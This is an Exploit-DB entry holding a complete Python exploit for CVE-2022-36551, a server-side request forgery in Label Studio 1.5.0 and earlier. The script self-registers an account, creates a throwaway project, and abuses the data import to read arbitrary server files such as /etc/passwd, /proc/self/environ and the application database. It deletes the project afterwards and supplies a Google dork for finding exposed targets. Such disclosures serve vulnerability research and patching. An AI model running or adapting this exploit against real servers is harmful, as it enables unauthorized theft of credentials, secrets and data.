Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)

EDB-ID:

51109




Platform:

Python

Date:

2023-03-28


# Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
# Date: 2022-10-03
# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
# Software Link: https://github.com/heartexlabs/label-studio/releases
# Version: <=1.5.0
# CVE : CVE-2022-36551
# Docker Container: heartexlabs/label-studio

# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition 
# versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system. 
# Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote 
# attacker to create a new account and then exploit the SSRF.

#
# This exploit has been tested on Label Studio 1.5.0
#

# Exploit Usage Examples (replace with your target details):
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3


import json
import argparse
import requests
import shutil                    
from urllib.parse import urljoin
from urllib.parse import urlparse
requests.packages.urllib3.disable_warnings() 

# main function for exploit
def main(url, filePath, writePath, username, password, shouldRegister):
    # check if the URL is reachable
    try:
        r = requests.get(url, verify=False)
        if r.status_code == 200:
            print("[+] URL is reachable")
        else:
            print("[!] Error: URL is not reachable, check the URL and try again")
            exit(1)

    except requests.exceptions.RequestException as e:
        print("[!] Error: URL is not reachable, check the URL and try again")
        exit(1)

    session = requests.Session()

    login(session, url, username, password, shouldRegister)
    print("[+] Logged in")
    print("[+] Creating project...")

    # Create a temp project
    projectDetails = create_project(session, url)
    print("[+] Project created, ID: {}".format(projectDetails["id"]))

    #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)
    print("[+] Attempting to fetch: {}".format(filePath))
    fetch_file(session, url, projectDetails["id"], filePath, writePath)

    print("[+] Deleting Project.. {}".format(projectDetails["id"]))
    delete_project(session, url, projectDetails["id"])
    print("[+] Project Deleted")

    print("[*] Finished executing exploit")


# login, logs the user in
def login(session, url, username, password, shouldRegister):

    # hit the main page first to get the CSRF token set
    r = session.get(url, verify=False)

    r = session.post(
        urljoin(url, "/user/login"),
        data={
            "email": username,
            "password": password,
            "csrfmiddlewaretoken": session.cookies["csrftoken"],
        },
        verify=False
    )

    if r.status_code == 200 and r.text.find("The email and password you entered") < 0:
        return
    elif r.text.find("The email and password you entered") > 0 and shouldRegister:
                
        print("[!] Account does not exist, registering...")
        r = session.post(
            urljoin(url, "/user/signup/"),
            data={
                "email": username,
                "password": password,
                "csrfmiddlewaretoken": session.cookies["csrftoken"],
                'allow_newsletters': False,
            },
        )
        if r.status_code == 302:
            # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)
            return

    else:
        print("[!] Error: Could not login, check the credentials and try again")
        exit(1)


# create_project creates a temporary project for exploiting the SSRF
def create_project(session, url):



    r = session.post(
        urljoin(url, "/api/projects"),
        data={
            "title": "TPS Report Finder",
        },
        verify=False
    )

    if r.status_code == 200 or r.status_code == 201:
        return r.json()
    else:
        print("[!] Error: Could not create project, check your credentials / permissions")
        exit(1)

def fetch_file(session, url, projectId, filePath, writePath):

    # if scheme is empty prepend file://
    parsedFilePath = urlparse(filePath)

    if parsedFilePath.scheme == "":
        filePath = "file://" + filePath

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    url = urljoin(url, "/api/projects/{}/import".format(projectId))
    r = session.post(url,
        data={
            "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL
        },
        headers=headers, 
        verify=False
    )

    if r.status_code == 201:
        # file found! -- first grab the file path details
        fileId = r.json()["file_upload_ids"][0]
        r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)
        r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)
        print("[+] File found!")

        # if user wants to write to disk, make it so
        if writePath != None:
            print("[+] Writing to {}".format(writePath))
            # write the file to disk
            with open(writePath, 'wb') as handle:
                shutil.copyfileobj(r.raw, handle)
                handle.close()
            return
        else:
            print("==========================================================")
            print(r.text)
            print("==========================================================")
            return
    else:
        print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
        print("\t" + r.json()["validation_errors"]["non_field_errors"][0])
        return


def delete_project(session, url, projectId):

    url = urljoin(url, "/api/projects/{}".format(projectId))
    r = session.delete(url, verify=False)
    if r.status_code == 200 or r.status_code == 204:
        return
    else:
        print( "[!] Error: Could not delete project, check your credentials / permissions")
        exit(1)

parser = argparse.ArgumentParser()

parser.add_argument("--url", required=True, help="Label Studio URL")
parser.add_argument("--file", required=True, help="Path to the file you want to fetch")
parser.add_argument("--out", required=False, help="Path to write the file.  If omitted will be written to STDOUT")
parser.add_argument("--username", required=False, help="Username for existing account (email)")
parser.add_argument("--password", required=False, help="Password for existing account")
parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",
)

args = parser.parse_args()
main(args.url, args.file, args.out, args.username, args.password, args.register)